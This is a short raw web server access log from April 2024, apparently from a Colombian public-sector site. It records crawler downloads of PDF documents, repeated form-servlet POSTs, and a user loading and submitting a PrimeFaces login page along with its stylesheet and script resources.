40.77.167.143 - - [03/Apr/2024:06:59:29 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202019/2461.pdf HTTP/1.1" 200 282167
201.245.192.253 - - [03/Apr/2024:07:00:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:07:00:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
66.249.66.21 - - [03/Apr/2024:07:01:16 -0500] "GET /Residuos/textiles/files/guia_textiles.pdf HTTP/1.1" 200 12356716
216.245.221.92 - - [03/Apr/2024:07:02:11 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [03/Apr/2024:07:02:31 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d66189f0c22d6a4c589cd0fb03154225f8.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
201.245.192.253 - - [03/Apr/2024:07:02:49 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d662c41b008f2848f8812f805002413222.e3iSbxaKaheRe3iNc3uNbNmQay1ynknvrkLOlQzNp65In0 HTTP/1.1" 200 2
186.80.108.8 - - [03/Apr/2024:07:02:53 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12727
186.80.108.8 - - [03/Apr/2024:07:02:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=TDrSrIs5+g6tdMMzNdOX9j8w.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
186.80.108.8 - - [03/Apr/2024:07:02:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=TDrSrIs5+g6tdMMzNdOX9j8w.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
186.80.108.8 - - [03/Apr/2024:07:02:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=TDrSrIs5+g6tdMMzNdOX9j8w.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
186.80.108.8 - - [03/Apr/2024:07:02:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=TDrSrIs5+g6tdMMzNdOX9j8w.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
186.80.108.8 - - [03/Apr/2024:07:02:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=TDrSrIs5+g6tdMMzNdOX9j8w.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
186.80.108.8 - - [03/Apr/2024:07:02:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=TDrSrIs5+g6tdMMzNdOX9j8w.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12405
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:02:56 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:03:01 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 11258
186.80.108.8 - - [03/Apr/2024:07:03:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:03:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:03:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:03:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:03:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.108.8 - - [03/Apr/2024:07:03:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
